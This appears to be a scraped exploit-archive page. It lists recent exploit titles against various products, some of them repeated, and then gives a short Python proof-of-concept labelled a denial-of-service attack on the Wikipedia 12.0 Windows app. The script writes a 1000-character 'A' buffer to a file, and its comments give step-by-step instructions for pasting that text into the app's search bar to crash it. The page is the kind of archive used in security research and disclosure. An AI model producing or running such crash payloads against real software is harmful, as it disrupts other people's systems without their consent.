
10 changes to exploits/shellcodes VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC) Visual Ping 0.8.0.0 - 'Host' Denial of Service (PoC) D-Link DIR-615 - Denial of Service (PoC) Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC) Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC) Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC) Wikipedia 12.0 - Denial of Service (PoC) Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting Argus Surveillance DVR 4.0.0.0 - Directory Traversal Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting WordPress Plugin Quizlord 2.0 - Cross-Site Scripting Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting Vox TG790 ADSL Router - Cross-Site Scripting FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions) Online Quiz Maker 1.0 - 'catid' SQL Injection
25 lines
No EOL
762 B
Python
Executable file
25 lines
No EOL
762 B
Python
Executable file
# Exploit Title: Wikipedia 12.0 - Denial of Service (PoC)
|
|
# Date: 9/2/2018
|
|
# Author: 0xB9
|
|
# Twitter: @0xB9Sec
|
|
# Contact: 0xB9[at]pm.me
|
|
# Software Link: https://www.microsoft.com/en-us/p/wikipedia/9wzdncrfhwm4?activetab=pivot%3aoverviewtab
|
|
# Version: 12.0
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# Run the python script, it will create a new file "wiki.txt"
|
|
# Copy the text from the generated wiki.txt file to clipboard
|
|
# Paste the text in the search bar in the top right of app
|
|
# App will now crash
|
|
|
|
buffer = "A" * 1000
|
|
payload = buffer
|
|
try:
|
|
f=open("wiki.txt","w")
|
|
print "[+] Creating %s evil payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |